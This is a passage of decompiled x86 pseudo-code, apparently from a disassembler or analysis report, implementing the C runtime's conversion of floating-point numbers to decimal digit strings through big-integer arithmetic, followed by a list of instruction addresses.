																	__eflags = _t1295 - _t900;
																	if(_t1295 == _t900) {
																		 *_t1144 =  *_t1144 & 0x00000000;
																		__eflags =  *_t1144;
																		_t609 = _t1295 + 1; // 0x1
																		_v1864 = _t609;
																	}
																	_v1868 = _v1868 + 4;
																	_t911 = _t1216;
																	_t1295 = _t1295 + 1;
																	_t1216 = 0;
																	 *_t1144 =  *_t1144 + _t911;
																	__eflags =  *_t1144;
																	_t900 = _v1864;
																	asm("adc edx, edx");
																	if( *_t1144 != 0) {
																		_t1144 = _v1868;
																		continue;
																	}
																	goto L240;
																}
															}
															L240:
															_t1215 = _v1872;
														}
														__eflags = _t1295 - 0x73;
														if(_t1295 == 0x73) {
															_t1291 = 0x1cc;
															goto L260;
														} else {
															_t1294 = _v1892;
															goto L243;
														}
													} else {
														__eflags = _t1255 - _t900;
														if(_t1255 == _t900) {
															 *(_t1310 + _t1255 * 4 - 0x740) =  *(_t1310 + _t1255 * 4 - 0x740) & 0x00000000;
															_t568 = _t1255 + 1; // 0x1
															_t900 = _t568;
															_v1864 = _t900;
														}
														goto L243;
													}
													goto L247;
													L243:
													_t1255 = _t1255 + 1;
													__eflags = _t1255 - _t1215;
												} while (_t1255 != _t1215);
												goto L244;
											}
										} else {
											_t1256 = _v468;
											_t1291 = 0x1cc;
											_v1936 = _t1256;
											_v472 = _t1215;
											E00C8A434( &_v468, 0x1cc,  &_v1396, _t1215 << 2);
											_t1315 =  &(_t1315[4]);
											__eflags = _t1256;
											if(_t1256 != 0) {
												__eflags = _t1256 - _t1099;
												if(_t1256 == _t1099) {
													goto L246;
												} else {
													__eflags = _v472;
													if(_v472 == 0) {
														goto L246;
													} else {
														_t1149 = 0;
														_v1920 = _v472;
														_t1257 = 0;
														__eflags = 0;
														do {
															_t925 = _v1936;
															_t1217 = _t925 *  *(_t1310 + _t1257 * 4 - 0x1d0) >> 0x20;
															 *(_t1310 + _t1257 * 4 - 0x1d0) = _t925 *  *(_t1310 + _t1257 * 4 - 0x1d0) + _t1149;
															asm("adc edx, 0x0");
															_t1257 = _t1257 + 1;
															_t1149 = _t1217;
															__eflags = _t1257 - _v1920;
														} while (_t1257 != _v1920);
														__eflags = _t1149;
														if(_t1149 == 0) {
															goto L246;
														} else {
															_t928 = _v472;
															__eflags = _t928 - 0x73;
															if(_t928 >= 0x73) {
																L260:
																_v2420 = 0;
																_v472 = 0;
																E00C8A434( &_v468, _t1291,  &_v2416, 0);
																_t1315 =  &(_t1315[4]);
																_t905 = 0;
															} else {
																 *(_t1310 + _t928 * 4 - 0x1d0) = _t1149;
																_v472 = _v472 + 1;
																goto L246;
															}
														}
													}
												}
											} else {
												_v2420 = 0;
												_v472 = 0;
												_push(0);
												_t902 =  &_v2416;
												L245:
												_push(_t902);
												_push(_t1291);
												_push( &_v468);
												E00C8A434();
												_t1315 =  &(_t1315[4]);
												L246:
												_t905 = _t1099;
											}
										}
									} else {
										_t1258 = _v1396;
										__eflags = _t1258;
										if(_t1258 != 0) {
											__eflags = _t1258 - _t1099;
											if(_t1258 == _t1099) {
												goto L198;
											} else {
												__eflags = _v472;
												if(_v472 == 0) {
													goto L198;
												} else {
													_t1150 = 0;
													_v1936 = _v472;
													_t1296 = 0;
													__eflags = 0;
													do {
														_t931 = _t1258;
														_t1218 = _t931 *  *(_t1310 + _t1296 * 4 - 0x1d0) >> 0x20;
														 *(_t1310 + _t1296 * 4 - 0x1d0) = _t931 *  *(_t1310 + _t1296 * 4 - 0x1d0) + _t1150;
														asm("adc edx, 0x0");
														_t1296 = _t1296 + 1;
														_t1150 = _t1218;
														__eflags = _t1296 - _v1936;
													} while (_t1296 != _v1936);
													__eflags = _t1150;
													if(_t1150 == 0) {
														goto L198;
													} else {
														_t934 = _v472;
														__eflags = _t934 - 0x73;
														if(_t934 >= 0x73) {
															_v2420 = 0;
															_v472 = 0;
															E00C8A434( &_v468, 0x1cc,  &_v2416, 0);
															_t1315 =  &(_t1315[4]);
															_t905 = 0;
															goto L199;
														} else {
															 *(_t1310 + _t934 * 4 - 0x1d0) = _t1150;
															_v472 = _v472 + 1;
															goto L198;
														}
													}
												}
											}
											goto L265;
										} else {
											__eflags = 0;
											_v2420 = 0;
											_v472 = 0;
											E00C8A434( &_v468, 0x1cc,  &_v2416, 0);
											_t1315 =  &(_t1315[4]);
											L198:
											_t905 = _t1099;
										}
										L199:
										_t1291 = 0x1cc;
									}
									L247:
									__eflags = _t905;
									if(_t905 == 0) {
										_v2420 = _v2420 & 0x00000000;
										_v472 = _v472 & 0x00000000;
										_push(0);
										L263:
										_push( &_v2416);
										_t882 =  &_v468;
										goto L264;
									} else {
										goto L248;
									}
									goto L265;
									L248:
									_t833 = _v1916 - _v1880;
									__eflags = _t833;
									_v1916 = _t833;
								} while (_t833 != 0);
								_t1125 = _v1908;
								goto L250;
							}
						} else {
							_t943 = _t831 / _t1124;
							_v1876 = _t943;
							_t1151 = _t831 % _t1124;
							_v1936 = _t1151;
							__eflags = _t943;
							if(_t943 == 0) {
								L178:
								__eflags = _t1151;
								if(_t1151 != 0) {
									_t944 =  *(0xc9b0b4 + _t1151 * 4);
									_v1936 = _t944;
									__eflags = _t944;
									if(_t944 != 0) {
										__eflags = _t944 - _t1099;
										if(_t944 != _t1099) {
											_t1152 = _v936;
											__eflags = _t1152;
											if(_t1152 != 0) {
												_v1876 = _v1876 & 0x00000000;
												_t1259 = 0;
												__eflags = 0;
												do {
													_t1220 = _t944 *  *(_t1310 + _t1259 * 4 - 0x3a0) >> 0x20;
													 *(_t1310 + _t1259 * 4 - 0x3a0) = _t944 *  *(_t1310 + _t1259 * 4 - 0x3a0) + _v1876;
													_t944 = _v1936;
													asm("adc edx, 0x0");
													_t1259 = _t1259 + 1;
													_v1876 = _t1220;
													__eflags = _t1259 - _t1152;
												} while (_t1259 != _t1152);
												__eflags = _t1220;
												if(_t1220 != 0) {
													_t947 = _v936;
													__eflags = _t947 - 0x73;
													if(_t947 >= 0x73) {
														goto L180;
													} else {
														 *(_t1310 + _t947 * 4 - 0x3a0) = _t1220;
														_v936 = _v936 + 1;
													}
												}
											}
										}
									} else {
										L180:
										_v2420 = 0;
										_v936 = 0;
										_push(0);
										goto L184;
									}
								}
							} else {
								do {
									__eflags = _t943 - 0x26;
									if(_t943 > 0x26) {
										_t943 = 0x26;
									}
									_t1153 =  *(0xc9b01e + _t943 * 4) & 0x000000ff;
									_v1868 = _t943;
									_v1400 = ( *(0xc9b01f + _t943 * 4) & 0x000000ff) + ( *(0xc9b01e + _t943 * 4) & 0x000000ff);
									E00C81190(_t1153 << 2,  &_v1396, 0, _t1153 << 2);
									_t960 = E00C80C10( &(( &_v1396)[_t1153]), 0xc9a718 + ( *(0xc9b01c + _v1868 * 4) & 0x0000ffff) * 4, ( *(0xc9b01f + _t943 * 4) & 0x000000ff) << 2);
									_t1221 = _v1400;
									_t1315 =  &(_t1315[6]);
									_v1872 = _t1221;
									__eflags = _t1221 - _t1099;
									if(_t1221 > _t1099) {
										__eflags = _v936 - _t1099;
										if(_v936 > _t1099) {
											__eflags = _t1221 - _v936;
											_t1298 =  &_v1396;
											_t340 = _t1221 - _v936 > 0;
											__eflags = _t340;
											_t961 = _t960 & 0xffffff00 | _t340;
											if(_t340 >= 0) {
												_t1298 =  &_v932;
											}
											_v1896 = _t1298;
											__eflags = _t961;
											if(_t961 == 0) {
												_v1892 = _t1221;
												_t1221 = _v936;
												_v1872 = _t1221;
												_v1916 =  &_v1396;
											} else {
												_v1892 = _v936;
												_v1916 =  &_v932;
											}
											_t963 = 0;
											_t1262 = 0;
											_v1864 = 0;
											__eflags = _t1221;
											if(_t1221 == 0) {
												L172:
												_v936 = _t963;
												_t1291 = 0x1cc;
												_t964 = _t963 << 2;
												__eflags = _t964;
												_push(_t964);
												_t965 =  &_v1860;
												goto L173;
											} else {
												do {
													__eflags =  *(_t1298 + _t1262 * 4);
													if( *(_t1298 + _t1262 * 4) != 0) {
														_t1154 = 0;
														_t1299 = _t1262;
														_v1880 = 0;
														_v1900 = 0;
														__eflags = _v1892;
														if(_v1892 != 0) {
															_t1222 = 0;
															while(1) {
																__eflags = _t1299 - 0x73;
																if(_t1299 == 0x73) {
																	break;
																}
																__eflags = _t1299 - _t963;
																if(_t1299 == _t963) {
																	 *(_t1310 + _t1299 * 4 - 0x740) =  *(_t1310 + _t1299 * 4 - 0x740) & 0x00000000;
																	_t372 = _t1262 + 1; // 0x1
																	_t981 = _t372 + _t1154;
																	__eflags = _t981;
																	_v1864 = _t981;
																}
																_t976 =  *(_v1916 + _t1154 * 4);
																_t1157 = _v1896;
																_t1222 = _t976 *  *(_t1157 + _t1262 * 4) >> 0x20;
																asm("adc edx, 0x0");
																 *(_t1310 + _t1299 * 4 - 0x740) = _t976 *  *(_t1157 + _t1262 * 4) +  *(_t1310 + _t1299 * 4 - 0x740) + _v1880;
																_t963 = _v1864;
																asm("adc edx, 0x0");
																_t1154 = _v1900 + 1;
																_v1880 = _t1222;
																_t1299 = _t1299 + 1;
																_v1900 = _t1154;
																__eflags = _t1154 - _v1892;
																if(_t1154 != _v1892) {
																	continue;
																}
																break;
															}
															__eflags = _t1222;
															if(_t1222 != 0) {
																_t1156 =  &_v1860 + _t1299 * 4;
																_v1880 = _t1156;
																while(1) {
																	__eflags = _t1299 - 0x73;
																	if(_t1299 == 0x73) {
																		goto L168;
																	}
																	__eflags = _t1299 - _t963;
																	if(_t1299 == _t963) {
																		 *_t1156 =  *_t1156 & 0x00000000;
																		__eflags =  *_t1156;
																		_t402 = _t1299 + 1; // 0x1
																		_v1864 = _t402;
																	}
																	_v1880 = _v1880 + 4;
																	_t974 = _t1222;
																	_t1299 = _t1299 + 1;
																	_t1222 = 0;
																	 *_t1156 =  *_t1156 + _t974;
																	__eflags =  *_t1156;
																	_t963 = _v1864;
																	asm("adc edx, edx");
																	if( *_t1156 != 0) {
																		_t1156 = _v1880;
																		continue;
																	}
																	goto L168;
																}
															}
															L168:
															_t1221 = _v1872;
														}
														__eflags = _t1299 - 0x73;
														if(_t1299 == 0x73) {
															__eflags = 0;
															_t1291 = 0x1cc;
															_v2420 = 0;
															_v936 = 0;
															_push(0);
															_t971 =  &_v2416;
															goto L182;
														} else {
															_t1298 = _v1896;
															goto L171;
														}
													} else {
														__eflags = _t1262 - _t963;
														if(_t1262 == _t963) {
															 *(_t1310 + _t1262 * 4 - 0x740) =  *(_t1310 + _t1262 * 4 - 0x740) & 0x00000000;
															_t361 = _t1262 + 1; // 0x1
															_t963 = _t361;
															_v1864 = _t963;
														}
														goto L171;
													}
													goto L175;
													L171:
													_t1262 = _t1262 + 1;
													__eflags = _t1262 - _t1221;
												} while (_t1262 != _t1221);
												goto L172;
											}
										} else {
											_t1263 = _v932;
											_t1291 = 0x1cc;
											_v1920 = _t1263;
											_v936 = _t1221;
											E00C8A434( &_v932, 0x1cc,  &_v1396, _t1221 << 2);
											_t1315 =  &(_t1315[4]);
											__eflags = _t1263;
											if(_t1263 != 0) {
												__eflags = _t1263 - _t1099;
												if(_t1263 == _t1099) {
													goto L174;
												} else {
													__eflags = _v936;
													if(_v936 == 0) {
														goto L174;
													} else {
														_t1161 = 0;
														_v1900 = _v936;
														_t1264 = 0;
														__eflags = 0;
														do {
															_t989 = _v1920;
															_t1223 = _t989 *  *(_t1310 + _t1264 * 4 - 0x3a0) >> 0x20;
															 *(_t1310 + _t1264 * 4 - 0x3a0) = _t989 *  *(_t1310 + _t1264 * 4 - 0x3a0) + _t1161;
															asm("adc edx, 0x0");
															_t1264 = _t1264 + 1;
															_t1161 = _t1223;
															__eflags = _t1264 - _v1900;
														} while (_t1264 != _v1900);
														__eflags = _t1161;
														if(_t1161 == 0) {
															goto L174;
														} else {
															_t992 = _v936;
															__eflags = _t992 - 0x73;
															if(_t992 >= 0x73) {
																_v1400 = 0;
																_v936 = 0;
																_push(0);
																_t971 =  &_v1396;
																L182:
																_push(_t971);
																_push(_t1291);
																_push( &_v932);
																E00C8A434();
																_t1315 =  &(_t1315[4]);
																_t968 = 0;
															} else {
																 *(_t1310 + _t992 * 4 - 0x3a0) = _t1161;
																_v936 = _v936 + 1;
																goto L174;
															}
														}
													}
												}
											} else {
												_v1400 = 0;
												_v936 = 0;
												_push(0);
												_t965 =  &_v1396;
												L173:
												_push(_t965);
												_push(_t1291);
												_push( &_v932);
												E00C8A434();
												_t1315 =  &(_t1315[4]);
												L174:
												_t968 = _t1099;
											}
										}
									} else {
										_t1265 = _v1396;
										__eflags = _t1265;
										if(_t1265 != 0) {
											__eflags = _t1265 - _t1099;
											if(_t1265 == _t1099) {
												goto L125;
											} else {
												__eflags = _v936;
												if(_v936 == 0) {
													goto L125;
												} else {
													_t1162 = 0;
													_v1920 = _v936;
													_t1300 = 0;
													__eflags = 0;
													do {
														_t996 = _t1265;
														_t1224 = _t996 *  *(_t1310 + _t1300 * 4 - 0x3a0) >> 0x20;
														 *(_t1310 + _t1300 * 4 - 0x3a0) = _t996 *  *(_t1310 + _t1300 * 4 - 0x3a0) + _t1162;
														asm("adc edx, 0x0");
														_t1300 = _t1300 + 1;
														_t1162 = _t1224;
														__eflags = _t1300 - _v1920;
													} while (_t1300 != _v1920);
													__eflags = _t1162;
													if(_t1162 == 0) {
														goto L125;
													} else {
														_t999 = _v936;
														__eflags = _t999 - 0x73;
														if(_t999 >= 0x73) {
															_v1400 = 0;
															_v936 = 0;
															E00C8A434( &_v932, 0x1cc,  &_v1396, 0);
															_t1315 =  &(_t1315[4]);
															_t968 = 0;
															goto L126;
														} else {
															 *(_t1310 + _t999 * 4 - 0x3a0) = _t1162;
															_v936 = _v936 + 1;
															goto L125;
														}
													}
												}
											}
											goto L265;
										} else {
											__eflags = 0;
											_v1864 = 0;
											_v936 = 0;
											E00C8A434( &_v932, 0x1cc,  &_v1860, 0);
											_t1315 =  &(_t1315[4]);
											L125:
											_t968 = _t1099;
										}
										L126:
										_t1291 = 0x1cc;
									}
									L175:
									__eflags = _t968;
									if(_t968 == 0) {
										_v2420 = _v2420 & 0x00000000;
										_t428 =  &_v936;
										 *_t428 = _v936 & 0x00000000;
										__eflags =  *_t428;
										_push(0);
										L184:
										_push( &_v2416);
										_t882 =  &_v932;
										L264:
										_push(_t1291);
										_push(_t882);
										E00C8A434();
										_t1315 =  &(_t1315[4]);
									} else {
										goto L176;
									}
									goto L265;
									L176:
									_t943 = _v1876 - _v1868;
									__eflags = _t943;
									_v1876 = _t943;
								} while (_t943 != 0);
								_t1151 = _v1936;
								goto L178;
							}
						}
						L265:
						_t1126 = _v472;
						_t1246 = _v1888;
						_v1872 = _t1246;
						__eflags = _t1126;
						if(_t1126 != 0) {
							_v1876 = _v1876 & 0x00000000;
							_t1251 = 0;
							__eflags = 0;
							do {
								_t871 =  *(_t1310 + _t1251 * 4 - 0x1d0);
								_t1212 = 0xa;
								_t1213 = _t871 * _t1212 >> 0x20;
								 *(_t1310 + _t1251 * 4 - 0x1d0) = _t871 * _t1212 + _v1876;
								asm("adc edx, 0x0");
								_t1251 = _t1251 + 1;
								_v1876 = _t1213;
								__eflags = _t1251 - _t1126;
							} while (_t1251 != _t1126);
							_t1246 = _v1872;
							__eflags = _t1213;
							if(_t1213 != 0) {
								_t874 = _v472;
								__eflags = _t874 - 0x73;
								if(_t874 >= 0x73) {
									__eflags = 0;
									_v2420 = 0;
									_v472 = 0;
									E00C8A434( &_v468, _t1291,  &_v2416, 0);
									_t1315 =  &(_t1315[4]);
								} else {
									 *(_t1310 + _t874 * 4 - 0x1d0) = _t1213;
									_v472 = _v472 + 1;
								}
							}
						}
						_t836 = E00C8EFA0( &_v472,  &_v936);
						_t1129 = _v1888;
						_t1202 = 0xa;
						__eflags = _t836 - _t1202;
						if(_t836 != _t1202) {
							__eflags = _t836;
							if(_t836 != 0) {
								_t1246 = _t1129 + 1;
								 *_t1129 = _t836 + 0x30;
								_v1872 = _t1246;
								goto L280;
							} else {
								_t838 = _v1904 - 1;
								goto L281;
							}
							goto L312;
						} else {
							_t862 = _v936;
							_t1246 = _t1129 + 1;
							_v1904 = _v1904 + 1;
							 *_t1129 = 0x31;
							_v1872 = _t1246;
							_v1908 = _t862;
							__eflags = _t862;
							if(_t862 != 0) {
								_t1250 = 0;
								_t1138 = 0;
								__eflags = 0;
								do {
									_t863 =  *(_t1310 + _t1138 * 4 - 0x3a0);
									 *(_t1310 + _t1138 * 4 - 0x3a0) = _t863 * _t1202 + _t1250;
									asm("adc edx, 0x0");
									_t1138 = _t1138 + 1;
									_t1250 = _t863 * _t1202 >> 0x20;
									_t1202 = 0xa;
									__eflags = _t1138 - _v1908;
								} while (_t1138 != _v1908);
								_v1908 = _t1250;
								__eflags = _t1250;
								_t1246 = _v1872;
								if(_t1250 != 0) {
									_t1139 = _v936;
									__eflags = _t1139 - 0x73;
									if(_t1139 >= 0x73) {
										_v2420 = 0;
										_v936 = 0;
										E00C8A434( &_v932, _t1291,  &_v2416, 0);
										_t1315 =  &(_t1315[4]);
									} else {
										 *((intOrPtr*)(_t1310 + _t1139 * 4 - 0x3a0)) = _v1908;
										_t719 =  &_v936;
										 *_t719 = _v936 + 1;
										__eflags =  *_t719;
									}
								}
								_t1129 = _v1888;
							}
							L280:
							_t838 = _v1904;
						}
						L281:
						 *((intOrPtr*)(_v1932 + 4)) = _t838;
						_t1204 = _v1928;
						__eflags = _t838;
						if(_t838 >= 0) {
							__eflags = _t1204 - 0x7fffffff;
							if(_t1204 <= 0x7fffffff) {
								__eflags = _a16;
								if(_a16 == 0) {
									_t1204 = _t1204 + _t838;
									__eflags = _t1204;
								}
							}
						}
						_t840 = _a28 - 1;
						__eflags = _t840 - _t1204;
						if(_t840 >= _t1204) {
							_t840 = _t1204;
						}
						_t841 = _t840 + _t1129;
						_t1205 = 0;
						_v1876 = _t841;
						_v1881 = 0;
						__eflags = _t1246 - _t841;
						if(_t1246 != _t841) {
							while(1) {
								_t846 = _v472;
								_v1908 = _t846;
								__eflags = _t846;
								if(_t846 == 0) {
									goto L309;
								}
								_t1248 = 0;
								_t1133 = 0;
								__eflags = 0;
								do {
									_t847 =  *(_t1310 + _t1133 * 4 - 0x1d0);
									_t1207 = _t847 * 0x3b9aca00 >> 0x20;
									 *(_t1310 + _t1133 * 4 - 0x1d0) = _t847 * 0x3b9aca00 + _t1248;
									asm("adc edx, 0x0");
									_t1133 = _t1133 + 1;
									_t1248 = 0x3b9aca00;
									__eflags = _t1133 - _v1908;
								} while (_t1133 != _v1908);
								_v1908 = 0x3b9aca00;
								__eflags = 0x3b9aca00;
								_t1249 = _v1872;
								if(0x3b9aca00 != 0) {
									_t1137 = _v472;
									__eflags = _t1137 - 0x73;
									if(_t1137 >= 0x73) {
										__eflags = 0;
										_v2420 = 0;
										_v472 = 0;
										E00C8A434( &_v468, _t1291,  &_v2416, 0);
										_t1315 =  &(_t1315[4]);
									} else {
										 *(_t1310 + _t1137 * 4 - 0x1d0) = _t1207;
										_v472 = _v472 + 1;
									}
								}
								_t852 = E00C8EFA0( &_v472,  &_v936);
								_v1928 = 8;
								_t1129 = _v1876 - _t1249;
								__eflags = _t1129;
								do {
									_v1908 = _t852 / _v1924;
									_t1210 = _t852 % _v1924 + 0x30;
									_t854 = _v1928;
									__eflags = _t1129 - _t854;
									if(_t1129 > _t854) {
										 *((char*)(_t854 + _t1249)) = _t1210;
										goto L304;
									} else {
										__eflags = _t1210 - 0x30;
										if(_t1210 == 0x30) {
											L304:
											_t1205 = _v1881;
										} else {
											_t1205 = _t1099;
											_v1881 = _t1205;
										}
									}
									_t855 = _t854 - 1;
									_v1928 = _t855;
									__eflags = _t855 - 0xffffffff;
									_t852 = _v1908;
								} while (_t855 != 0xffffffff);
								__eflags = _t1129 - 9;
								if(_t1129 > 9) {
									_t1129 = 9;
								}
								_t1246 = _t1249 + _t1129;
								_v1872 = _t1246;
								__eflags = _t1246 - _v1876;
								if(_t1246 != _v1876) {
									continue;
								}
								goto L309;
							}
						}
						L309:
						 *_t1246 = 0;
						__eflags = _v472;
						if(_v472 != 0) {
							goto L311;
						} else {
							__eflags = _t1205;
							if(__eflags != 0) {
								goto L311;
							}
						}
						goto L312;
					} else {
						_t1129 = _v1932;
						 *((intOrPtr*)(_v1932 + 4)) = _t1099;
						_t1084 = _t802 - 1;
						__eflags = _t1084;
						if(_t1084 == 0) {
							_t1085 = E00C84D82(_v1888, _a28, "1#INF");
							__eflags = _t1085;
							if(_t1085 != 0) {
								goto L315;
							} else {
								L311:
								_t1099 = 0;
								__eflags = 0;
								goto L312;
							}
						} else {
							_t1090 = _t1084 - 1;
							__eflags = _t1090;
							if(_t1090 == 0) {
								_push("1#QNAN");
								goto L20;
							} else {
								_t1092 = _t1090 - 1;
								__eflags = _t1092;
								if(_t1092 == 0) {
									_push("1#SNAN");
									goto L20;
								} else {
									__eflags = _t1092 != 1;
									if(_t1092 != 1) {
										goto L24;
									} else {
										_push("1#IND");
										goto L20;
									}
								}
							}
						}
					}
				} else {
					_t1129 = _t1283 & 0x000fffff;
					if((_a4 | _t1283 & 0x000fffff) == 0 || (_v1956 & 0x01000000) != 0) {
						_push(0xc9b0dc);
						 *((intOrPtr*)(_v1932 + 4)) =  *(_v1932 + 4) & 0x00000000;
						L20:
						_push(_a28);
						_push(_v1888);
						if(E00C84D82() != 0) {
							L315:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C83466();
							asm("int3");
							return E00C91826(E00C91848(__eflags));
						} else {
							L312:
							_t1327 = _v1944;
							if(_v1944 != 0) {
								E00C9128D(_t1129, _t1327,  &_v1952);
							}
							return E00C7F35B(_v8 ^ _t1310);
						}
					} else {
						goto L12;
					}
				}
			}

0x00c8f428
0x00c8f428
0x00c8f42b
0x00c8f42d
0x00c8f433
0x00c8f43a
0x00c8f440
0x00c8f449
0x00c8f457
0x00c8f467
0x00c8f46b
0x00c8f47d
0x00c8f483
0x00c8f46d
0x00c8f46d
0x00c8f46d
0x00c8f489
0x00c8f48a
0x00c8f48d
0x00c8f490
0x00c8f491
0x00c8f493
0x00c8f4a2
0x00c8f49d
0x00c8f49f
0x00c8f49f
0x00c8f4a4
0x00c8f4ae
0x00c8f4b6
0x00c8f4c0
0x00c8f4cf
0x00c8f4d4
0x00c8f502
0x00c8f506
0x00c8f50c
0x00c8f50e
0x00c8f581
0x00c8f58a
0x00c8f597
0x00c8f59b
0x00c8f59e
0x00c8f5a4
0x00c8f5ac
0x00c8f5b2
0x00c8f5bc
0x00c8f5bc
0x00c8f5bf
0x00c8f5cb
0x00c8f5d2
0x00c8f5d2
0x00c8f5d2
0x00c8f5c1
0x00c8f5c3
0x00c8f5c3
0x00c8f5de
0x00c8f5ec
0x00c8f5f2
0x00c8f5f4
0x00c8f5fc
0x00c8f602
0x00c8f607
0x00c8f608
0x00c8f609
0x00c8f613
0x00c8f618
0x00c8f620
0x00c8f621
0x00c8f626
0x00c8f62f
0x00c8f62f
0x00c8f631
0x00c8f628
0x00c8f628
0x00c8f62d
0x00000000
0x00000000
0x00c8f62d
0x00c8f637
0x00c8f645
0x00c8f647
0x00c8f650
0x00c8f656
0x00c8f657
0x00c8f65d
0x00c8f663
0x00c8f669
0x00c8fa08
0x00c8fa0b
0x00c8fb25
0x00c8fb27
0x00c8fb2c
0x00c8fb2c
0x00c8fb2c
0x00c8fb3a
0x00c8fb41
0x00c8fb44
0x00c8fb49
0x00c8fb49
0x00c8fb46
0x00c8fb46
0x00c8fb46
0x00c8fb4d
0x00c8fb4f
0x00c8fb53
0x00c8fb55
0x00c8fb58
0x00c8fb87
0x00c8fb8a
0x00c8fb8d
0x00c8fb8f
0x00c8fb92
0x00c8fb92
0x00c8fb94
0x00c8fb9f
0x00c8fb9f
0x00c8fb96
0x00c8fb96
0x00c8fb96
0x00c8fba1
0x00c8fba3
0x00c8fbae
0x00c8fbae
0x00c8fba5
0x00c8fba5
0x00c8fba5
0x00c8fbb7
0x00c8fbbe
0x00c8fbbf
0x00c8fbc0
0x00c8fbc3
0x00000000
0x00000000
0x00c8fbc5
0x00c8fbc5
0x00c8fb92
0x00c8fbcd
0x00c8fbcd
0x00c8fb5a
0x00c8fb5a
0x00c8fb67
0x00c8fb7d
0x00c8fb82
0x00c8fb82
0x00c8fbe6
0x00c8fbf2
0x00c8fbff
0x00c8fc01
0x00c8fa11
0x00c8fa11
0x00c8fa18
0x00c8fa22
0x00c8fa2c
0x00c8fa2e
0x00c8fa34
0x00c8fa34
0x00c8fa36
0x00c8fa36
0x00c8fa3d
0x00c8fa44
0x00000000
0x00000000
0x00c8fa4a
0x00c8fa4d
0x00c8fa50
0x00000000
0x00c8fa52
0x00c8fa52
0x00c8fa54
0x00c8fa57
0x00c8fa5d
0x00c8fa62
0x00c8fa5f
0x00c8fa5f
0x00c8fa5f
0x00c8fa66
0x00c8fa69
0x00c8fa6d
0x00c8fa6f
0x00c8fa72
0x00c8fa9e
0x00c8faa1
0x00c8faa4
0x00c8faa6
0x00c8faa9
0x00c8faa9
0x00c8faab
0x00c8fab6
0x00c8faad
0x00c8faad
0x00c8faad
0x00c8fab8
0x00c8faba
0x00c8fac5
0x00c8fabc
0x00c8fabc
0x00c8fabc
0x00c8facf
0x00c8fad6
0x00c8fad7
0x00c8fad8
0x00c8fadb
0x00000000
0x00000000
0x00c8fadd
0x00c8fadd
0x00c8faa9
0x00c8fae5
0x00c8fae5
0x00c8fa74
0x00c8fa7b
0x00c8fa88
0x00c8fa94
0x00c8fa99
0x00c8fa99
0x00c8fafe
0x00c8fb0a
0x00c8fb19
0x00c8fb19
0x00000000
0x00c8fa50
0x00c8fa36
0x00000000
0x00c8fa2e
0x00c8fc08
0x00c8fc08
0x00c8fc0b
0x00c8fc10
0x00c8fc16
0x00c8fc2f
0x00c8fc36
0x00c8fc39
0x00c8fc39
0x00c8f66f
0x00c8f66f
0x00c8f676
0x00c8f680
0x00c8f68a
0x00c8f68c
0x00c8f870
0x00c8f870
0x00c8f87c
0x00c8f884
0x00c8f88a
0x00c8f894
0x00c8f89a
0x00c8f89f
0x00c8f8a5
0x00c8f8a6
0x00c8f8a6
0x00c8f8a6
0x00c8f8ad
0x00c8f8b3
0x00c8f8b5
0x00c8f8c2
0x00c8f8c5
0x00c8f8d0
0x00c8f8d0
0x00c8f8d0
0x00c8f8c7
0x00c8f8c8
0x00c8f8c8
0x00c8f8d7
0x00c8f8dd
0x00c8f8e2
0x00c8f8e5
0x00c8f8e8
0x00c8f91b
0x00c8f921
0x00c8f927
0x00c8f929
0x00c8f92f
0x00c8f932
0x00000000
0x00c8f934
0x00c8f934
0x00c8f937
0x00c8f938
0x00c8f93e
0x00c8f944
0x00c8f946
0x00c8f94e
0x00c8f94e
0x00c8f956
0x00c8f959
0x00c8f95f
0x00c8f95f
0x00c8f961
0x00c8f968
0x00c8f968
0x00c8f963
0x00c8f963
0x00c8f963
0x00c8f96a
0x00c8f970
0x00c8f973
0x00c8f975
0x00c8f97b
0x00c8f97b
0x00c8f977
0x00c8f977
0x00c8f977
0x00c8f99f
0x00c8f9a7
0x00c8f9b6
0x00c8f9b7
0x00c8f9ba
0x00c8f9c0
0x00c8f9c1
0x00c8f9c7
0x00c8f9cd
0x00000000
0x00000000
0x00c8f9cf
0x00c8f9cf
0x00c8f9d7
0x00c8f9d7
0x00c8f9dd
0x00c8f9df
0x00c8f9e1
0x00c8f9e9
0x00c8f9e9
0x00c8f9e9
0x00c8f9f1
0x00c8f9f1
0x00c8f8ea
0x00c8f8ea
0x00c8f8ed
0x00c8f8f3
0x00c8f908
0x00c8f90d
0x00c8f90d
0x00c8f9f7
0x00c8fa01
0x00c8f692
0x00c8f692
0x00c8f692
0x00c8f694
0x00c8f69b
0x00c8f6a2
0x00000000
0x00000000
0x00c8f6a8
0x00c8f6ab
0x00c8f6ae
0x00000000
0x00c8f6b0
0x00c8f6b0
0x00c8f6bc
0x00c8f6c4
0x00c8f6ca
0x00c8f6d4
0x00c8f6da
0x00c8f6df
0x00c8f6e5
0x00c8f6e6
0x00c8f6e6
0x00c8f6e6
0x00c8f6ed
0x00c8f6f3
0x00c8f6f5
0x00c8f702
0x00c8f705
0x00c8f710
0x00c8f710
0x00c8f710
0x00c8f707
0x00c8f708
0x00c8f708
0x00c8f717
0x00c8f71d
0x00c8f722
0x00c8f725
0x00c8f728
0x00c8f75b
0x00c8f761
0x00c8f767
0x00c8f769
0x00c8f76f
0x00c8f772
0x00000000
0x00c8f774
0x00c8f774
0x00c8f777
0x00c8f778
0x00c8f77e
0x00c8f784
0x00c8f786
0x00c8f78e
0x00c8f78e
0x00c8f796
0x00c8f799
0x00c8f79f
0x00c8f79f
0x00c8f7a1
0x00c8f7a8
0x00c8f7a8
0x00c8f7a3
0x00c8f7a3
0x00c8f7a3
0x00c8f7aa
0x00c8f7b0
0x00c8f7b3
0x00c8f7b5
0x00c8f7bb
0x00c8f7bb
0x00c8f7b7
0x00c8f7b7
0x00c8f7b7
0x00c8f7df
0x00c8f7e7
0x00c8f7f6
0x00c8f7f7
0x00c8f7fa
0x00c8f800
0x00c8f801
0x00c8f807
0x00c8f80d
0x00000000
0x00000000
0x00c8f80f
0x00c8f80f
0x00c8f817
0x00c8f817
0x00c8f81d
0x00c8f81f
0x00c8f821
0x00c8f829
0x00c8f829
0x00c8f829
0x00c8f831
0x00c8f831
0x00c8f72a
0x00c8f72a
0x00c8f72d
0x00c8f733
0x00c8f748
0x00c8f74d
0x00c8f74d
0x00c8f839
0x00c8f83a
0x00c8f840
0x00c8f840
0x00000000
0x00c8f6ae
0x00000000
0x00c8f694
0x00c8f841
0x00c8f841
0x00c8f84e
0x00c8f855
0x00c8f85b
0x00c8f85c
0x00c8f85d
0x00c8f863
0x00c8f868
0x00c8f868
